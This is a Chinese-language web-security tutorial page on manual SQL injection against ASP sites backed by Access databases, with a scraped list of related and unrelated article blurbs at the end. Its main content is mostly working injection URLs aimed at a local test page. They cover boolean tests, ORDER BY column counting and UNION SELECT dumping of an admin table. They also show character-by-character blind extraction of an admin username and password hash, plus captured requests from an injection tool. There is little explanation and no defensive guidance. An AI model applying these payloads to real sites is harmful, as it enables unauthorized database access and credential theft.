WEB安全 asp+access注入

asp+access注入

数据库 （access数据库没有数据库名）

表名

	字段(列名)

	记录(行,内容)

注入常用函数：

top n 表示查询结果的第n个记录

len() 函数返回文本字段中值的长度

mid(column_name,start[,length])函数用于从文本字段中提取指定长度的字符

asc() 返回指定文本字符的ASCII码

ORDER BY 语句用于根据指定的列对结果集进行排序。默认按照升序对记录进行排序，降序使用 DESC 关键字。order by admin DESC

一、asp+access 手工注入联合查询法

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 22

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 order by 23

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

admin  a48e190fafc257d3   //and 1=2 UNION ALL SELECT 1,2,3,..... form admin 这种方法也用于先报错再获取可显示位

http

二、asp+access 手工逐字猜解法

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(admin) from admin)=5 //admin

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 (a)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,2,1)) from admin)=100 (d)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,3,1)) from admin)=109 (m)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,4,1)) from admin)=105 (i)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,5,1)) from admin)=110 (n)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(password) from admin)=16  //a48e190fafc257d3

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97 (a)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,2,1)) from admin)=52 (4)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,3,1)) from admin)=56 (8)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,4,1)) from admin)=101 (e)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,5,1)) from admin)=49 (1)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,6,1)) from admin)=57 (9)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,7,1)) from admin)=48 (0)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,8,1)) from admin)=102 (f)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,9,1)) from admin)=97 (a)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,10,1)) from admin)=102 (f)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,11,1)) from admin)=99 (c)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,12,1)) from admin)=50 (2)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,13,1)) from admin)=53 (5)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,14,1)) from admin)=55 (7)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,15,1)) from admin)=100 (d)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,16,1)) from admin)=51 (3)

三、明小子注入工具抓包分析 asp+access逐字猜解法 抓包工具：SRSniffer,WSockExpert

1.检测是否是注入点：

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from sysobjects)

2.猜是否存在指定表名：

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from user)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from menbers)

3.猜指定表是否存在指定列名（也叫字段）：

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select username from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select admin from admin)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select password from admin)

3.猜admin表第一个字段有几行记录（2行记录表示两个用户）：

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)<=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=1

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Count(1) From [admin] Where 1=1)=2

4.猜第一行记录长度://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=2

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=4

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)<=6

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([admin])) From (Select Top 1 * From [admin] Where 1=1 Order by [admin]) T Order by [admin] desc)=5

5.猜解第一个用户admin字段一位字符,对比ASCII值：

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select top 1 admin from admin where instr(admin,'admin')=1 and len(username)=5)

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 97 and 97

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 100 and 100

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 109 and 109

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),4,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 105 and 105

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 30 and 130

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(admin),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [admin]) T Order by [admin] desc) between 110 and 110

6.猜解password字段长度、每一位字符:

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 And (Select Top 1 len(cstr([password])) From (Select Top 1 * From [admin] Where 1=1 Order by [password]) T Order by [password] desc)=16

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),1,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),2,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 52 and 52

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),3,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 56 and 56

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),4,1)) from (Select Top 2 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 101 and 101

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),5,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 49 and 49

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),6,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 57 and 57

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),7,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 48 and 48

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),8,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),9,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 97 and 97

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),10,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 102 and 102

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),11,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 99 and 99

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),12,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 50 and 50

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),13,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 53 and 53

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),14,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 55 and 55

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),15,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 100 and 100

http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(cstr(password),16,1)) from (Select Top 1 * from [admin] where 1=1 order by [password]) T Order by [password] desc) between 51 and 51

附：

WEB安全 asp+access注入的更多相关文章

复习ACCESS注入
0x00前言:在学校看完了ACCESS注入.但当时并没有电脑,所以做好了笔记回到家自己搭建了一个有ACCESS注入的站进行练习,虽然这可能没有什么用处毕竟现在大多的网站都有waf或安全狗.而且AC ...
Web安全之 SQL注入
随着B/S模式应用开发的发展,使用这种模式编写的应用程序也越来越多.相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患.用户可以提交一段数据库查询代码,根据 ...
ASP/SQL 注入天书
引言随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据 ...
64位Win7下运行ASP+Access网站的方法
64位Win7下运行ASP+Access网站的方法近日系统升级为WIN7 64位之后,突然发现原本运行正常的ASP+ACCESS网站无法正常连接数据库. 网上搜索多次,终于解决了问题,总结了几条经验 ...
WEB 安全之 SQL注入 < 三 > 提权
SQL注入是一个比较“古老”的话题,虽然现在存在这种漏洞的站点比较少了,我们还是有必要了解一下它的危害,及其常用的手段,知己知彼方能百战不殆.进攻与防守相当于矛和盾的关系,我们如果能清楚了解攻击的全 ...
WEB 安全之 SQL注入 < 二 > 暴库
SQL注入是一个比较"古老"的话题,虽然现在存在这种漏洞的站点比较少了,我们还是有必要了解一下它的危害,及其常用的手段,知己知彼方能百战不殆.进攻与防守相当于矛和盾的关系,我们如果 ...
使用Windows Server 2003搭建一个asp+access网站
鼠标右键->新建->网站->下一步->描述(随便给一个,这里我以test为例) ->下一步->下一步->输入主目录的路径,默认路径下是C:\Inetpub\w ...
access注入
前面有自己总结详细的mysql注入,自己access注入碰到的比较少,虽然比较简单,但是这里做一个总结 union联合查询法: 因为union前后字段数相同,所以可以先用order by 22 使查询 ...
access注入篇+sqlmap
access数据库的来历,我就不说了,因为我懒的记,就算记了感觉上也没大多用处,只要记得数据库的结构就行了.先是表名,然后是列名,再者就是数据,我发个实际的图吧,大概就是这么一个结构. 下面,开始说下 ...

随机推荐

Chrome , Firfox 不支持fireEvent的方法
转自:http://bossdai.iteye.com/blog/2111458 Chrome , Firfox 不支持fireEvent的方法可以使用dispatchEvent的方法替代, 直接给 ...
ASP.NET 表单验证方法与客户端(浏览器)服务器交互机制的故事
想到这个问题完全是一个意外吧,是在寻找另外一个问题答案的过程中,才对验证方法与浏览器服务器交互机制的关系有了清晰的认识. 先说下验证方法,验证方法分为前台验证和后台验证. 前台验证就是类似jQuery ...
qq iOS环境配置及调用
1.下载官方iOS sdk:地址:相关文档 2. 将iOS SDK中的TencentOpenAPI.framework和TencentOpenApi_IOS_Bundle.bundle文件拷贝到应用开 ...
三、cent OS安装配置nginx
简介Tengine是淘宝发起的web服务器项目,简单的讲就是对nginx进行了二次开发并提供了更丰富的功能,官网地址:http://tengine.taobao.org/ 下载nginx这里使用淘宝二 ...
撩课-Java每天5道面试题第10天
撩课Java+系统架构视频点击开始学习 81.Servlet的会话机制? HTTP 是一种无状态协议, 这意味着每次客户端检索网页时, 都要单独打开一个服务器连接, 因此服务器不会记录下先前客户 ...
UVA 562(01背包)
http://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&category=114&page=s ...
Zookeeper Curator API 使用
0. 原生 ZOOKEEPER JAVA API http://www.cnblogs.com/rocky-fang/p/9030438.html 1. 概述 Curator采用cache封装对事件 ...
【python基础】之str类字符串
str类字符串是不可变对象 1.创建字符串 s1 = str() #创建一个空字符串 s2 = str("hello") #创建字符串"hello" 2.处理字 ...
C语言四舍五入算法
对h进行四舍五入 1. 网络上搜索来的: C语言取整规则: (int)(h + 0.5) 2. 二级教程: 四舍五入并精确到小数点后面的第n位: 实例:
numpy数组属性查看及断言
numpy数组属性查看:类型.尺寸.形状.维度 import numpy as np a1 = np.array([1,2,3,4],dtype=np.complex128) print(a1) ...

WEB安全 asp+access注入

WEB安全 asp+access注入的更多相关文章

随机推荐

热门专题